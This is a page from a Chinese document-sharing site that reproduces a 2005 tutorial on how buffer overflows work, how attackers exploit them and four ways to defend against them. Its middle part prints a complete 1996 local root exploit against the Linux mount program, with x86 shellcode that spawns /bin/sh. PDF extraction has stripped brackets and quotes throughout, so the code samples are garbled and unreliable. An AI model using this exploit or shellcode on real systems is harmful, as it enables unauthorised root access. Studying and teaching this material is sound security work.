2022年2022年缓冲区溢出原理及防护 .pdf

上传人:Che****ry 文档编号:27243951 上传时间:2022-07-23 格式:PDF 页数:7 大小:85.59KB
返回 下载 相关 举报
2022年2022年缓冲区溢出原理及防护 .pdf_第1页
第1页 / 共7页
2022年2022年缓冲区溢出原理及防护 .pdf_第2页
第2页 / 共7页
点击查看更多>>
资源描述

《2022年2022年缓冲区溢出原理及防护 .pdf》由会员分享,可在线阅读,更多相关《2022年2022年缓冲区溢出原理及防护 .pdf(7页珍藏版)》请在taowenge.com淘文阁网|工程机械CAD图纸|机械工程制图|CAD装配图下载|SolidWorks_CaTia_CAD_UG_PROE_设计图分享下载上搜索。

1、缓冲区溢出原理及防护时间: 2005-6-5 作者:中科院研究生院蒋涛摘要本文详细分析了缓冲区溢出的原理,描述了网络攻击者利用缓冲区溢出漏洞进行系统攻击的一般过程,最后简单讨论了几种缓冲区溢出的保护方法。关键词缓冲区溢出缓冲区溢出漏洞安全攻击缓冲区溢出保护在过去的十年中,以缓冲区溢出为攻击类型的安全漏洞是最为常见的一种形式。更为严重的是,缓冲区溢出漏洞占了远程网络攻击的绝大多数,这种攻击可以使得一个匿名的Internet用户有机会获得一台主机的部分或全部的控制权!由于这类攻击使任何人都有可能取得主机的控制权,所以它代表了一类极其严重的安全威胁。缓冲区溢出攻击之所以成为一种常见的攻击手段,其原因

2、在于缓冲区溢出漏洞太普通了,并且易于实现。而且, 缓冲区溢出所以成为远程攻击的主要手段,其原因在于缓冲区溢出漏洞给予了攻击者所想要的一切:植入并且执行攻击代码。被植入的攻击代码以一定的权限运行有缓冲区溢出漏洞的程序,从而得到被攻击主机的控制权。本文简单介绍了缓冲区溢出的基本原理和预防办法。一、缓冲区溢出的概念和原理缓冲区是内存中存放数据的地方。在程序试图将数据放到机器内存中的某一个位置的时候,因为没有足够的空间就会发生缓冲区溢出。而人为的溢出则是有一定企图的,攻击者写一个超过缓冲区长度的字符串,植入到缓冲区, 然后再向一个有限空间的缓冲区中植入超长的字符串, 这时可能会出现两个结果:一是过长的

3、字符串覆盖了相邻的存储单元,引起程序运行失败, 严重的可导致系统崩溃;另一个结果就是利用这种漏洞可以执行任意指令,甚至可以取得系统root特级权限。缓冲区是程序运行的时候机器内存中的一个连续块,它保存了给定类型的数据,随着动态分配变量会出现问题。大多时为了不占用太多的内存,一个有动态分配变量的程序在程序运行时才决定给它们分配多少内存。如果程序在动态分配缓冲区放入超长的数据,它就会溢出了。一个缓冲区溢出程序使用这个溢出的数据将汇编语言代码放到机器的内存里,通常是产生 root 权限的地方。仅仅单个的缓冲区溢出并不是问题的根本所在。但如果溢出送到能够以 root 权限运行命令的区域,一旦运行这些命

4、令,那可就等于把机器拱手相让了。造成缓冲区溢出的原因是程序中没有仔细检查用户输入的参数。例如下面程序:example1.c void func1(char *input) char buffer16; strcpy(buffer, input); 上面的 strcpy()将直接吧input中的内容copy 到 buffer中。这样只要input的长度名师资料总结 - - -精品资料欢迎下载 - - - - - - - - - - - - - - - - - - 名师精心整理 - - - - - - - 第 1 页,共 7 页 - - - - - - - - - 大于 16,就会造成buffer

5、的溢出,使程序运行出错。存在像strcpy这样的问题的标准函数还有 strcat(),sprintf(),vsprintf(),gets(),scanf(),以及在循环内的getc(),fgetc(),getchar()等。当然,随便往缓冲区中填东西造成它溢出一般只会出现Segmentation fault 错误,而不能达到攻击的目的。最常见的手段是通过制造缓冲区溢出使程序运行一个用户shell ,再通过 shell执行其他命令。 如果该程序属于root且有 suid 权限的话, 攻击者就获得了一个有 root权限的 shell ,便可以对系统进行任意操作了。请注意,如果没有特别说明,下面的内

6、容都假设用户使用的平台为基于Intel x86 CPU的 Linux 系统。对其他平台来说,本文的概念同样适用,但程序要做相应修改。二、制造缓冲区溢出一个程序在内存中通常分为程序段、数据段和堆栈三部分。程序段里放着程序的机器码和只读数据。数据段放的是程序中的静态数据。动态数据则通过堆栈来存放。在内存中,它们的位置是:当程序中发生函数调用时,计算机做如下操作:首先把参数压入堆栈;然后保存指令寄存器 (IP) 中的内容作为返回地址(RET) ;第三个放入堆栈的是基址寄存器(FP) ;然后把当前的栈指针 (SP)拷贝到 FP,做为新的基地址;最后为本地变量留出一定空间,把SP减去适当的数值。以下面程

7、序为例:example2.c void func1(char * input) char buffer16; strcpy(buffer, input); void main() char longstring256; int i; for( i = 0; i 255; i+) 名师资料总结 - - -精品资料欢迎下载 - - - - - - - - - - - - - - - - - - 名师精心整理 - - - - - - - 第 2 页,共 7 页 - - - - - - - - - longstring i = B; func1(longstring); 当调用函数func1()时,堆

8、栈如下:不用说,程序执行的结果是Segmentation fault (core dumped)或类似的出错信息。因为从 buffer开始的 256个字节都将被 * input的内容 B 覆盖,包括 sfp, ret, 甚至 *input 。B 的 16 进值为 0 x41,所以函数的返回地址变成了0 x41414141,这超出了程序的地址空间,所以出现段错误。三、缓冲区溢出漏洞攻击方式缓冲区溢出漏洞可以使任何一个有黑客技术的人取得机器的控制权甚至是最高权限。一般利用缓冲区溢出漏洞攻击root程序,大都通过执行类似“exec(sh) ”的执行代码来获得root 的 shell 。黑客要达到目的

9、通常要完成两个任务,就是在程序的地址空间里安排适当的代码和通过适当的初始化寄存器和存储器,让程序跳转到安排好的地址空间执行。1、在程序的地址空间里安排适当的代码在程序的地址空间里安排适当的代码往往是相对简单的。如果要攻击的代码在所攻击程序中已经存在了, 那么就简单地对代码传递一些参数,然后使程序跳转到目标中就可以完成了。攻击代码要求执行“ exec( /bin/sh ) ”,而在 libc库中的代码执行“ exec(arg) ”,其中的“ arg”是个指向字符串的指针参数,只要把传入的参数指针修改指向“/bin/sh ”,然后再跳转到libc库中的响应指令序列就可以了。当然,很多时候这个可能性

10、是很小的,那么就得用一种叫“植入法”的方式来完成了。当向要攻击的程序里输入一个字符串时,程序就会把这个字符串放到缓冲区里,这个字符串包含的数据是可以在这个所攻击的目标的硬件平台上运行的指令序列。缓冲区可以设在:堆栈(自动变量)、堆(动态分配的)和静态数据区 (初始化或者未初始化的数据)等的任何地方。 也可以不必为达到这个目的而溢出任何缓冲区,只要找到足够的空间来放置这些攻击代码就够了。2、控制程序转移到攻击代码的形式缓冲区溢出漏洞攻击都是在寻求改变程序的执行流程,使它跳转到攻击代码,最为基本的就是溢出一个没有检查或者其他漏洞的缓冲区,这样做就会扰乱程序的正常执行次序。通过溢出某缓冲区, 可以改

11、写相近程序的空间而直接跳转过系统对身份的验证。原则上来讲攻击时所针对的缓冲区溢出的程序空间可为任意空间。但因不同地方的定位相异,所以也就带出了多种转移方式。名师资料总结 - - -精品资料欢迎下载 - - - - - - - - - - - - - - - - - - 名师精心整理 - - - - - - - 第 3 页,共 7 页 - - - - - - - - - (1)Function Pointers(函数指针)在程序中,“ void (* foo)( ) ”声明了个返回值为“ void ” Function Pointers的变量“foo ”。 Function Pointers可以

12、用来定位任意地址空间,攻击时只需要在任意空间里的 Function Pointers邻近处找到一个能够溢出的缓冲区,然后用溢出来改变Function Pointers。当程序通过Function Pointers调用函数,程序的流程就会实现。(2)Activation Records(激活记录)当一个函数调用发生时,堆栈中会留驻一个Activation Records,它包含了函数结束时返回的地址。 执行溢出这些自动变量,使这个返回的地址指向攻击代码,再通过改变程序的返回地址。当函数调用结束时,程序就会跳转到事先所设定的地址,而不是原来的地址。这样的溢出方式也是较常见的。(3)Longjmp

13、buffers(长跳转缓冲区)在 C语言中包含了一个简单的检验/恢复系统,称为“ setjmp/longjmp ”,意思是在检验点设定“ setjmp(buffer)”,用longjmp(buffer)“来恢复检验点。如果攻击时能够进入缓冲区的空间,感觉“ longjmp(buffer)”实际上是跳转到攻击的代码。像Function Pointers一样,longjmp 缓冲区能够指向任何地方,所以找到一个可供溢出的缓冲区是最先应该做的事情。3、植入综合代码和流程控制常见的溢出缓冲区攻击类是在一个字符串里综合了代码植入和Activation Records。攻击时定位在一个可供溢出的自动变量,

14、然后向程序传递一个很大的字符串,在引发缓冲区溢出改变Activation Records的同时植入代码(权因C在习惯上只为用户和参数开辟很小的缓冲区) 。 植入代码和缓冲区溢出不一定要一次性完成,可以在一个缓冲区内放置代码(这个时候并不能溢出缓冲区),然后通过溢出另一个缓冲区来转移程序的指针。这样的方法一般是用于可供溢出的缓冲区不能放入全部代码时的。如果想使用已经驻留的代码不需要再外部植入的时候,通常必须先把代码做为参数。在libc (熟悉 C的朋友应该知道,现在几乎所有的 C程序连接都是利用它来连接的)中的一部分代码段会执行“exec(something) ”,当中的 something 就

15、是参数, 使用缓冲区溢出改变程序的参数,然后利用另一个缓冲区溢出使程序指针指向libc中的特定的代码段。程序编写的错误造成网络的不安全性也应当受到重视,因为它的不安全性已被缓冲区溢出表现得淋漓尽致了。四、利用缓冲区溢出进行的系统攻击如果已知某个程序有缓冲区溢出的缺陷,如何知道缓冲区的地址,在哪儿放入shell代码呢?由于每个程序的堆栈起始地址是固定的,所以理论上可以通过反复重试缓冲区相对于堆栈起始位置的距离来得到。但这样的盲目猜测可能要进行数百至上千次,实际上是不现实的。解决的办法是利用空指令NOP 。在 shell代码前面放一长串的NOP ,返回地址可以指向这一串NOP 中任一位置, 执行完

16、 NOP指令后程序将激活shell进程。这样就大大增加了猜中的可能性。下面是一个缓冲区溢出攻击的实例,它利用了系统程序mount 的漏洞:名师资料总结 - - -精品资料欢迎下载 - - - - - - - - - - - - - - - - - - 名师精心整理 - - - - - - - 第 4 页,共 7 页 - - - - - - - - - example5.c /* Mount Exploit for Linux, Jul 30 1996 Discovered and Coded by Bloodmask & VioCovin Security 1996 */ #include #

17、include #include #include #include #define PATH_MOUNT /bin/umount #define BUFFER_SIZE 1024 #define DEFAULT_OFFSET 50 u_long get_esp() _asm_(movl %esp,%eax); main(int argc, char *argv) u_char execshell = xebx24x5ex8dx1ex89x5ex0bx33xd2x89x56x07x89x56x0f xb8x1bx56x34x12x35x10 x56x34x12x8dx4ex0bx8bxd1xc

18、d x80 x33xc0 x40 xcdx80 xe8xd7xffxffxff/bin/sh; char *buff = NULL; unsigned long *addr_ptr = NULL; char *ptr = NULL; int i; int ofs = DEFAULT_OFFSET; buff = malloc(4096); if(!buff) printf(cant allocate memoryn); exit(0); ptr = buff; /* fill start of buffer with nops */ memset(ptr, 0 x90, BUFFER_SIZE

19、-strlen(execshell); ptr += BUFFER_SIZE-strlen(execshell); /* stick asm code into the buffer */ for(i=0;i strlen(execshell);i+) *(ptr+) = execshelli; addr_ptr = (long *)ptr; for(i=0;i (8/4);i+) 名师资料总结 - - -精品资料欢迎下载 - - - - - - - - - - - - - - - - - - 名师精心整理 - - - - - - - 第 5 页,共 7 页 - - - - - - - - -

20、 *(addr_ptr+) = get_esp()+ ofs; ptr = (char *)addr_ptr; *ptr = 0; (void)alarm(u_int)0); printf(Discovered and Coded by Bloodmask and Vio, Covin 1996n); execl(PATH_MOUNT,mount, buff, NULL); 程序中 get_esp()函数的作用就是定位堆栈位置。程序首先分配一块暂存区buff,然后在 buff的前面部分填满NOP ,后面部分放shell代码。最后部分是希望程序返回的地址,由栈地址加偏移得到。当以buff为参数调

21、用mount 时,将造成mount 程序的堆栈溢出,其缓冲区被buff覆盖,而返回地址将指向NOP指令。由于 mount 程序的属主是root且有 suid 位, 普通用户运行上面程序的结果将获得一个具有 root 权限的 shell 。五、缓冲区溢出的保护方法目前有四种基本的方法保护缓冲区免受缓冲区溢出的攻击和影响:1、强制写正确的代码的方法编写正确的代码是一件非常有意义但耗时的工作,特别像编写C语言那种具有容易出错倾向的程序 (如:字符串的零结尾),这种风格是由于追求性能而忽视正确性的传统引起的。尽管花了很长的时间使得人们知道了如何编写安全的程序,具有安全漏洞的程序依旧出现。因此人们开发了

22、一些工具和技术来帮助经验不足的程序员编写安全正确的程序。虽然这些工具帮助程序员开发更安全的程序,但是由于C语言的特点, 这些工具不可能找出所有的缓冲区溢出漏洞。 所以,侦错技术只能用来减少缓冲区溢出的可能,并不能完全地消除它的存在。除非程序员能保证他的程序万无一失,否则还是要用到以下部分的内容来保证程序的可靠性能。2、通过操作系统使得缓冲区不可执行,从而阻止攻击者殖入攻击代码这种方法有效地阻止了很多缓冲区溢出的攻击,但是攻击者并不一定要殖入攻击代码来实现缓冲区溢出的攻击,所以这种方法还是存在很多弱点的。3、利用编译器的边界检查来实现缓冲区的保护这个方法使得缓冲区溢出不可能出现,从而完全消除了缓

23、冲区溢出的威胁,但是相对而言代价比较大。4、在程序指针失效前进行完整性检查这样虽然这种方法不能使得所有的缓冲区溢出失效,但它的确确阻止了绝大多数的缓冲区溢出攻击,而能够逃脱这种方法保护的缓冲区溢出也很难实现。最普通的缓冲区溢出形式是攻击活动纪录然后在堆栈中殖入代码。这种类型的攻击在名师资料总结 - - -精品资料欢迎下载 - - - - - - - - - - - - - - - - - - 名师精心整理 - - - - - - - 第 6 页,共 7 页 - - - - - - - - - 1996 年中有很多纪录。而非执行堆栈和堆栈保护的方法都可以有效防卫这种攻击。非执行堆栈可以防卫所有把

24、代码殖入堆栈的攻击方法,堆栈保护可以防卫所有改变活动纪录的方法。这两种方法相互兼容,可以同时防卫多种可能的攻击。剩下的攻击基本上可以用指针保护的方法来防卫,但是在某些特殊的场合需要用手工来实现指针保护。 全自动的指针保护需要对每个变量加入附加字节,这样使得指针边界检查在某些情况下具有优势。最为有趣的是,缓冲区溢出漏洞-Morris蠕虫使用了现今所有方法都无法有效防卫的方法,但是由于过于复杂的缘故却很少有人用到。在本文中, 我们详细描述和分析了缓冲区溢出的原理,并简单介绍了几种防卫方法。由于这种攻击是目前常见的攻击手段,所以进行这个方面的研究工作是有意义和成效的。参考文献1 网络入侵检测分析员手册. Stephen Northcutt著.余青霓等译 . 人民邮电出版社,2000.3 2 C语言疑难问题解析. 严桂兰 ,刘甲耀编著 . 华东华工学院出版社,1993,1. 3 网络最高安全技术指南. 王锐等译 . 机械工业出版社,1998,5. 名师资料总结 - - -精品资料欢迎下载 - - - - - - - - - - - - - - - - - - 名师精心整理 - - - - - - - 第 7 页,共 7 页 - - - - - - - - -

展开阅读全文
相关资源
相关搜索

当前位置:首页 > 教育专区 > 高考资料

本站为文档C TO C交易模式,本站只提供存储空间、用户上传的文档直接被用户下载,本站只是中间服务平台,本站所有文档下载所得的收益归上传人(含作者)所有。本站仅对用户上传内容的表现方式做保护处理,对上载内容本身不做任何修改或编辑。若文档所含内容侵犯了您的版权或隐私,请立即通知淘文阁网,我们立即给予删除!客服QQ:136780468 微信:18945177775 电话:18904686070

工信部备案号:黑ICP备15003705号© 2020-2023 www.taowenge.com 淘文阁